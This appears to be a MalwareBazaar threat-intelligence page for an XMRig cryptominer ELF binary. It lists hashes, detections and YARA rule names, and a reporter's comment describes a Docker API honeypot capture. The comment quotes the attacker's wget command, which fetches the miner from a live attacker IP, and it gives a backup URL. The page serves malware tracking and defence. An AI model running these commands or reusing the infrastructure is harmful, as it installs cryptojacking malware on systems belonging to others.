MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 adfa14deed04a850938bf48ef190b1f30b93d1bebe07ad2e7d0b48d8a03bdabc. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

CoinMiner

Vendor detections: 9

Intelligence 9 IOCs YARA 11 File information Comments 1

SHA256 hash:	adfa14deed04a850938bf48ef190b1f30b93d1bebe07ad2e7d0b48d8a03bdabc
SHA3-384 hash:	033ea319ca0e032509b49777cac9fe32bd15cab6f1f6ab90ca4402e301992d871361a7e75cbe19d9137527d67cf914db
SHA1 hash:	e882c96908a674c5e0fe757c7fa3220831c3e8b2
MD5 hash:	775196e6aa8c3dfd0ca492a0ba61c57d
humanhash:	mirror-failed-sodium-bulldog
File name:	xmrig_dropped.elf
Download:	download sample
Signature	CoinMiner Create hunting rule
File size:	5'642'288 bytes
First seen:	2026-06-02 13:08:56 UTC
Last seen:	Never
File type:	elf
MIME type:	application/x-executable
ssdeep	98304:pJHqPBEyaD71+euktzX07w8w0JArrMGAB3UPEeG9dk7esNC0+JLu9uRNrPODOmv:IasgG9mtNgu4nOCg
TLSH	T16E468D4BF1F394ACC09FC4340B5BD592AA7074B802357A3B3794AA312E77EA15769F21
telfhash	t1592262b09ae930b19196c75af7a2f5b49a331cf652f835b0852a7d42cfc4fc40c56c2a
TrID	50.1% (.) ELF Executable and Linkable format (Linux) (4022/12) 49.8% (.O) ELF Executable and Linkable format (generic) (4000/1)
Magika	elf
Reporter	nullblue67
Tags:	alpine-container CoinMiner elf linux miner Monero XMRIG

Intelligence

File Origin

# of uploads :

# of downloads :

Origin country :

Vendor Threat Intelligence

No detections

Detection(s):

PUA.Unix.Coinminer.XMRig-6683890-0

Result

Verdict:

Malware

Maliciousness:

Behaviour

Collects information on the CPU

Verdict:

Likely Malicious

Threat level:

7.5/10

Confidence:

100%

Tags:

gcc miner

Link:

https://www.filescan.io/uploads/6a1ed60e099ef368af168523/reports/4a4e9de1-342b-430d-9bd9-8a2cdd7be794/overview

Status:

terminated

Link:

https://sandbox.kunai.rocks/analysis/b325a4bd-f7fd-4b94-bb33-553d7c7d86a4

Behavior Graph:

Download SVG

Malware family:

XMRig Miner

Verdict:

Malicious

Link:

https://analyze.intezer.com/analyses/1b053e8b-a440-470e-aa6f-c95482e06d99

Score:

100%

Verdict:

Malware

File Type:

ELF

Link:

https://malprob.io/report/adfa14deed04a850938bf48ef190b1f30b93d1bebe07ad2e7d0b48d8a03bdabc

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/adfa14deed04a850938bf48ef190b1f30b93d1bebe07ad2e7d0b48d8a03bdabc/

Threat name:

Linux.Coinminer.XMRig

Status:

Malicious

First seen:

2026-06-02 13:10:55 UTC

File Type:

ELF64 Little (Exe)

AV detection:

23 of 36 (63.89%)

Threat level:

4/5

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=vx5bjxxnasufbe4l6shpdefr6mfzhun6xyd22lt5bnenrib33k6a._file

Result

Malware family:

xmrig

Score:

10/10

Tags:

family:xmrig discovery linux miner

Link:

https://tria.ge/reports/260602-qd3zrse18j/

Behaviour

Reads CPU attributes

Please note that we are no longer able to provide a coverage score for Virus Total.

Threat name:

DriveBy

Score:

0.90

Link:

https://yomi.yoroi.company/submissions/adfa14deed04a850938bf48ef190b1f30b93d1bebe07ad2e7d0b48d8a03bdabc

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:	CP_Script_Inject_Detector Create hunting rule
Author:	DiegoAnalytics
Description:	Detects attempts to inject code into another process across PE, ELF, Mach-O binaries

Rule name:	F01_s1ckrule Create hunting rule
Author:	s1ckb017

Rule name:	ldpreload Create hunting rule
Author:	xorseed
Reference:	https://stuff.rop.io/

Rule name:	Linux_Trojan_Pornoasset_927f314f Create hunting rule
Author:	Elastic Security

Rule name:	MacOS_Cryptominer_Xmrig_241780a1 Create hunting rule
Author:	Elastic Security

Rule name:	Multi_Cryptominer_Xmrig_f9516741 Create hunting rule
Author:	Elastic Security

Rule name:	TH_Generic_MassHunt_Linux_Malware_2026_CYFARE Create hunting rule
Author:	CYFARE
Description:	Generic Linux malware mass-hunt rule - 2026
Reference:	https://cyfare.net/

Rule name:	unixredflags3 Create hunting rule
Author:	Tim Brown @timb_machine
Description:	Hunts for UNIX red flags

Rule name:	WHIRLPOOL_Constants Create hunting rule
Author:	phoul (@phoul)
Description:	Look for WhirlPool constants

Rule name:	XMRIG_Monero_Miner Create hunting rule
Author:	Florian Roth (Nextron Systems)
Description:	Detects Monero mining software
Reference:	https://github.com/xmrig/xmrig/releases

Rule name:	xmrig_v1 Create hunting rule
Author:	RandomMalware

File information

The table below shows additional information about this malware sample such as delivery method and external references.

No further information available

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

commented on 2026-06-02 13:12:48 UTC

🍯 Captured via Docker API honeypot — captured by NullBlue67 — 2026-06-02.

Standard XMRig miner binary deployed via cryptojacking campaign.

Delivery chain:
• Attacker 151.243.150.40 (IR) hit Docker API /containers/create with alpine:latest image
• Container fetches: wget -qO /tmp/._x http://151.243.150.40/xmrig
• Backup URL: http://151.243.150.40:8080/static/xmrig-linux-x64
• Victim drop path: /tmp/._x

Binary details:
• ELF 64-bit x86_64, statically linked, stripped
• BuildID: a71c406483dd4f8482f9bf6ba78b705a84656b8f
• MD5: 775196e6aa8c3dfd0ca492a0ba61c57d
• Compiled GCC 13.3.0 (Ubuntu 24.04.1)
• 5.6 MB
• Algorithms: RandomX, RandomX-Graft, RandomXYadaCoin

XMRig version exposed (xmrig.com/wizard, --donate-level, RandomX modes). Standard upstream XMRig — not modified, just repurposed for cryptojacking.

Reported infrastructure:
• 151.243.150.40:80 → ThreatFox + AbuseIPDB (100% confidence)
• Filenames: xmrig / xmrig-linux-x64

#xmrig #monero #cryptojacking #docker-api #miner #linux